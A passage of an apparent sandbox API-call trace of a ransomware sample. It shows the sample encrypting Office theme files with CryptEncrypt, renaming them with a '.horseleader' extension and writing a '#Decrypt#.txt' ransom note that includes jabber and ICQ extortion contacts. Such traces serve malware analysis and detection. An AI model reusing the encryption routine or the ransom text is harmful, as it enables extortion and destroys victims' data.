Files\\Microsoft 
Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.horseleader") returned 92 [0247.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\preview.gif.horseleader")) returned 1 [0247.697] GetProcessHeap () returned 0x780000 [0247.697] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.697] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ffb1e00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x5a89bd50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1ffb1e00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x1205e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="RICEPAPR.ELM", cAlternateFileName="")) returned 1 [0247.697] lstrcmpiW (lpString1="RICEPAPR.ELM", lpString2="Windows") returned -1 [0247.697] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.ELM") returned 81 [0247.697] StrStrIW (lpFirst="RICEPAPR.ELM", lpSrch=".horseleader") returned 0x0 [0247.697] lstrcmpW (lpString1="RICEPAPR.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.698] lstrcmpW (lpString1="RICEPAPR.ELM", lpString2="_uninstalling_.png") returned 1 [0247.698] lstrlenW (lpString=".testttjffg") returned 11 [0247.698] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.ELM", lpSrch=".testttjffg") returned 0x0 [0247.698] CryptGenRandom 
(in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.698] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.698] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ricepapr.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.700] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.ELM") returned 81 [0247.700] StrStrW (lpFirst="RICEPAPR.ELM", lpSrch=".txt") returned 0x0 [0247.700] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=73822) returned 1 [0247.700] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.700] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.710] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.710] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.711] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x682f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.711] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, 
nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.712] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.712] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.712] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xd05e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.712] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.712] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.712] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.712] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.712] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.713] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.713] 
CloseHandle (hObject=0x1a4) returned 1 [0247.713] GetProcessHeap () returned 0x780000 [0247.713] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.713] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.ELM.horseleader") returned 93 [0247.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ricepapr.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ricepapr.elm.horseleader")) returned 1 [0247.716] GetProcessHeap () returned 0x780000 [0247.716] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.716] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d1db890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x239, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="RICEPAPR.INF", cAlternateFileName="")) returned 1 [0247.716] lstrcmpiW (lpString1="RICEPAPR.INF", lpString2="Windows") returned -1 [0247.716] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF") returned 81 [0247.716] StrStrIW (lpFirst="RICEPAPR.INF", lpSrch=".horseleader") returned 0x0 [0247.716] lstrcmpW (lpString1="RICEPAPR.INF", lpString2="#Decrypt#.txt") returned 1 [0247.716] 
lstrcmpW (lpString1="RICEPAPR.INF", lpString2="_uninstalling_.png") returned 1 [0247.716] lstrlenW (lpString=".testttjffg") returned 11 [0247.716] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF", lpSrch=".testttjffg") returned 0x0 [0247.716] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.716] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.716] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ricepapr.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.717] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF") returned 81 [0247.717] StrStrW (lpFirst="RICEPAPR.INF", lpSrch=".txt") returned 0x0 [0247.717] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=569) returned 1 [0247.717] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x239, lpOverlapped=0x0) returned 1 [0247.719] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdc7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.719] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x239, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x239, lpOverlapped=0x0) returned 1 [0247.719] SetFilePointerEx (in: hFile=0x1a4, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.719] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.720] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.720] CloseHandle (hObject=0x1a4) returned 1 [0247.720] GetProcessHeap () returned 0x780000 [0247.720] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.720] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF.horseleader") returned 93 [0247.720] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ricepapr.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\ricepapr.inf.horseleader")) returned 1 [0247.722] GetProcessHeap () returned 0x780000 [0247.722] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.722] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, 
nFileSizeLow=0xcf7b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.722] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.722] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 81 [0247.722] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.722] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.723] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.723] lstrlenW (lpString=".testttjffg") returned 11 [0247.723] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.723] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.723] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.723] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.724] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG") returned 81 [0247.724] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.724] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=53115) returned 1 [0247.724] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.726] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.727] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.728] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.728] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.728] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.728] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2f7b, lpOverlapped=0x0) returned 1 [0247.729] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd085, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.729] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2f7b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2f7b, lpOverlapped=0x0) returned 1 [0247.729] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.729] WriteFile 
(in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.729] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.730] CloseHandle (hObject=0x1a4) returned 1 [0247.730] GetProcessHeap () returned 0x780000 [0247.730] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.730] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.horseleader") returned 93 [0247.730] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\thmbnail.png.horseleader")) returned 1 [0247.731] GetProcessHeap () returned 0x780000 [0247.731] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.731] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xcf7b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 
0 [0247.731] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.731] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\#Decrypt#.txt") returned 82 [0247.731] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ricepapr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.732] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.732] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.734] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.734] WriteFile (in: hFile=0x158, 
lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.734] CloseHandle (hObject=0x158) returned 1 [0247.734] GetProcessHeap () returned 0x780000 [0247.734] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.734] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="RIPPLE", cAlternateFileName="")) returned 1 [0247.734] lstrcmpiW (lpString1="RIPPLE", lpString2="Windows") returned -1 [0247.734] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE") returned 66 [0247.735] lstrcmpW (lpString1="RIPPLE", lpString2=".") returned 1 [0247.735] lstrcmpW (lpString1="RIPPLE", lpString2="..") returned 1 [0247.735] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.735] GetProcessHeap () returned 0x780000 [0247.735] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.735] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\*") returned 68 [0247.735] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RIPPLE\\*", lpFindFileData=0x32aeba0 | out: 
